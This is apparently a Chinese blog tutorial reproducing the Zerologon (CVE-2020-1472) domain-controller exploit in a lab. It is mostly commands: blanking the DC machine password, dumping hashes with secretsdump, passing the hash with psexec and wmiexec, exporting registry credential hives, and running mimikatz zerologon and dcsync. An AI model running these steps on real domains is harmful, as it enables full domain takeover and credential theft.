2. 程式人生 > 實用技巧 >cve-2020-1472,netlogon特權提升漏洞復現

cve-2020-1472,netlogon特權提升漏洞復現

阿新 發佈:2020-10-20

cve-2020-1472,netlogon特權提升漏洞,

漏洞原理:攻擊者通過NetLogon(MS-NRPC),建立與域控間易受攻擊的安全通道時,可利用此漏洞獲取域管訪問許可權。成功利用此漏洞的攻擊者可以在該網路中的裝置上執行經特殊設計的應用程式。

影響版本號:

Windows Server 2008 R2 for x64-based Systems Service Pack 1

Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)

Windows Server 2012

Windows Server 2012 (Server Core installation)

Windows Server 2012 R2

Windows Server 2012 R2 (Server Core installation)

Windows Server 2016

Windows Server 2016 (Server Core installation)

Windows Server 2019

Windows Server 2019 (Server Core installation)

Windows Server, version 1903 (Server Core installation)

Windows Server, version 1909 (Server Core installation)

Windows Server, version 2004 (Server Core installation)
工具 zerologon_teste
pip3 install -r requirements
安裝requirements的依賴環境

安裝最新的impacket方法:

git clone https://github.com/SecureAuthCorp/impacket.git
cd impacket
virtualenv  --python=python3 impacket 
source impacket/bin/activate
pip3 install .

python3 -m pip install .

step1:探測目標機是否存在cve-2020-1472

python3 zerologon_tester.py 域控主機名  域控IP  
python3 zerologon_tester.py  win08  192.168.223.133

step2: 將目標機中域控win08$的密碼清空

 python3  cve-2020-1472-exploit.py  域控主機名  域控IP  
python3  cve-2020-1472-exploit.py  win08  192.168.223.133

step3:使用impacket下的secretdump.py去獲取域控的HASH

secretsdump.py test.com/win08\[email protected] -no-pass

使用PTH登入域控;

psexec.py test.com/[email protected]  -hashes :獲取的administrator中hash值

wmiexec.py test.com/[email protected] -hashes :獲取的administrator中hash值
wmiexec.py test.com/[email protected] -hashes  :afffeba176210fad4628f0524bfe1942

執行系統命令

reg save hklm\sam sam.hive
reg save hklm\system system.hive
reg save hklm\security security.hive
注:上述產生的檔案是存在目標機中,需要匯出到攻擊機中;
get sam.hive
get system.hive
get security.hive

使用mimikatz或者secretsdumo.py讀取檔案

secretsdump.py -sam sam.hive -system system.hive -security security.hive LOCAL

step4:恢復域控的密碼

python3 reinstall_original_pw.py  win08 192.168.223.133 79e0831681fc703c76295202fac36b0570a0d536a302ecc37341df6018b2918941743a443f9c19f26edc57c7b0dfa4f26c83419552bd45e5f110622582f27f649dd4a63be6e93d106f68b2d03043b4e24f076177084534594750ac8fc054bf3118f4bd73ac506cafb051d60d6fcff4852474ceebba12726551d81031e84e06d21380b96f1b0ad6d9736854af6fe20719aa70342ac77f75099521854ad02cac1901b87300172f03b1e185de535ebc22a568fd38c9ab53bd4fa3d621126af124e5eb1c7d74470add983f16420ca005156442bde6e08a4312fe510712911f408efde41dbd9ea8e2c0281872362250a07d2c


恢復密碼效果測試,如果可以登入則證明沒有成功寫入密碼:

python3 secretdump.py  test.com/win08\[email protected]  -no-pass

使用mimikatz.exe去攻擊域控

檢測目標機是否存在cve2020-1472

 lsadump::zerologon  /target:域控IP  /account:域控主機名$
lsadump::zerologon  /target:192.168.223.133 /account:win08$

清空域控密碼

lsadump::zerologon  /target:域控IP  /account:域控主機名$  /exploit
lsadump::zerologon /target:192.168.223.133 /account:win08$ /exploit

獲取目標機的HASH

 lsadump::dcsync /domain:de1ay.com /dc:dc.de1ay.com /user:krbtgt /authuser:dc$ /authdomain:de1ay.com /authpassword:"" /authntlm
注意:本地測試需要將DNS指向域控

lsadump::dcsync /domain:test.com /win08:win08.test.com /user:administrator /authuser:win08$ /authdomain:test.com /authpassword:"" /authntlm

恢復密碼

lsadump::postzerologon /target:dc.de1ay.com /account:dc$
lsadump::postzerologon /target:192.168.223.133 /account:win08$

注:mimikatz在讀取域內HASH的時候需要配置DNS 指向域控 /dc: win08.test.com 這裡填寫域控的完整的名字 ; 輸入引數都正確的情況還獲取不了, 重啟AD服務 在恢復密碼的時候注意先去執行privilege::debug

相關推薦

cve-2020-1472netlogon特權提升漏洞復現

cve-2020-1472,netlogon特權提升漏洞, 漏洞原理:攻擊者通過NetLogon(MS-NRPC)建立與域控間易受攻擊的安全通道時可利用此漏洞獲取域管訪問許可權。成功利用此漏洞的攻擊者可以在該網路中的裝置上執行經特殊設

CVE-2020-1472 | Netlogon 特權提升漏洞預警

CVE-2020-1472 | Netlogon 特權提升漏洞預警 0x01 簡介 CNVD:http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-202008-548

Ladon外掛-CVE-2020-1472域控提權漏洞EXP

漏洞簡述 2020年08月12日 360CERT監測發現Windows官方 釋出了 NetLogon 特權提升漏洞 的風險通告漏洞編號為 CVE-2020-1472漏洞等級:嚴重漏洞評分:10分。

CVE-2020-14645 Weblogic遠端程式碼執行漏洞復現

CVE-2020-14645Weblogic遠端程式碼執行漏洞復現 漏洞介紹 今日Oracle官方釋出WebLogic安全更新其中修復了一個CVSS評分為9.8的嚴重漏洞(CVE-2020-14645)漏洞通過T3協議進行利用攻擊者可以實現遠端程式碼執行

微軟NetLogon許可權提升 CVE-2020-1472 漏洞復現

簡介 NetLogon 遠端協議是一種在 Windows 域控上使用的 RPC 介面,被用於各種與使用者和機器認證相關的任務。最常用於讓使用者使用 NTLM 協議登入伺服器也用於 NTP 響應認證以及更新計算機域密碼

CVE-2020-1472漏洞復現

摘要 2020年08月12日Windows官方 釋出了 NetLogon 特權提升漏洞的風險通告漏洞編號為 CVE-2020-1472漏洞等級:嚴重漏洞評分:10分

ZeroLogon(CVE-2020-1472) 漏洞的攻擊與防禦策略(下)

上文我們介紹了攻擊原理本文我們將詳細介紹可以發起的攻擊種類和防禦措施。

CVE-2020-0674 IE遠端程式碼執行漏洞

0x00 漏洞描述 該漏洞影響元件為jscript.dll該動態連結庫是微軟Internet Explorer瀏覽器的Javascript引擎之一其中IE8及以下使用jscript.dllIE9及以上預設使用jscript9.dll但網頁可以通過《script》標籤指定

CVE-2021-3156)Linux sudo許可權提升漏洞 復現

技術標籤:許可權提升提權網路安全CVE-2021-3156 漏洞概述 1月26日Sudo釋出安全通告修復了一個類Unix作業系統在命令引數中轉義反斜槓時存在基於堆的緩衝區溢位漏洞。當sudo通過-s或-i命令列選項在shell模式下

CVE-2020-1472

主要記下流程 我擦這個洞mimikatz也可以搞 但是我就不記錄了 檢驗漏洞是否存在

漏洞復現-CVE-2020-1938-Tomcat 檔案讀取/包含漏洞

0x00 實驗環境 攻擊機:Win 10 靶場:docker拉的vulhub靶場 0x01 影響版本 受影響版本 ApacheTomcat6

CVE-2020-14882 weblogic 未授權訪問漏洞

(1)許可權繞過漏洞CVE-2020-14882)因為CVE-2020-14882未授權訪問漏洞是繞過管理控制檯許可權訪問後臺所以需要存在console控制檯訪問:ip:port/console

polkit(ploicykit)特權提升漏洞解決方案

一、【概述】   polkit 的 pkexec 存在本地許可權提升漏洞已獲得普通許可權的攻擊者可通過此漏洞獲取root許可權漏洞利用難度低。

Linux Polkit本地許可權提升漏洞復現CVE-2021-4034)

漏洞描述 Polkit 是用於在類 Unix 作業系統中控制系統範圍特權的元件。它為非特權程序提供了與特權程序進行通訊的有組織的方式。

S2-052(CVE-2017-9805) 遠端程式碼執行漏洞復現

0x01 漏洞說明 漏洞編號:CVE-2017-9805(S2-052)影響版本: Struts 2.1.2 - Struts 2.3.33, Struts 2.5 - Struts 2.5.12漏洞詳情:http://struts.apache.org/docs/s2-052.html

CVE-2020-14882 weblogic 未授權命令執行復現

簡介 未經身份驗證的遠端攻擊者可能通過構造特殊的 HTTP GET請求利用該漏洞在受影響的 WebLogic Server 上執行任意程式碼。

CVE-2020-14882​&14883:Weblogic RCE復現

0x01 簡介 Weblogic是美國Oracle公司出品的一個Application Server確切的說是一個基於JavaEE架構的中介軟體Weblogic是用於開發、整合、部署和管理大型分散式Web應用、網路應用和資料庫應用的Java應用伺服器。

【SQL】CVE-2012-2122 MySQL身份認證繞過漏洞復現

漏洞簡介 當連線 MariaDB / MySQL 時輸入的密碼會與期望的正確密碼比較由於不正確的處理會導致即便是 memcmp() 返回一個非零值也會使 MySQL 認為兩個密碼是相同的。

CVE-2021-35042 Django order_by SQL注入 漏洞復現和分析

CVE-2021-35042 Django order_by SQL注入 漏洞復現和分析 目錄 CVE-2021-35042 Django order_by SQL注入 漏洞復現和分析

CVE-2020-0668(Microsoft Windows Kernel許可權提升漏洞)

目標:mail.sync.net 1.需要四個引數分別為: --validationkey = CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF(預設漏洞產生原因)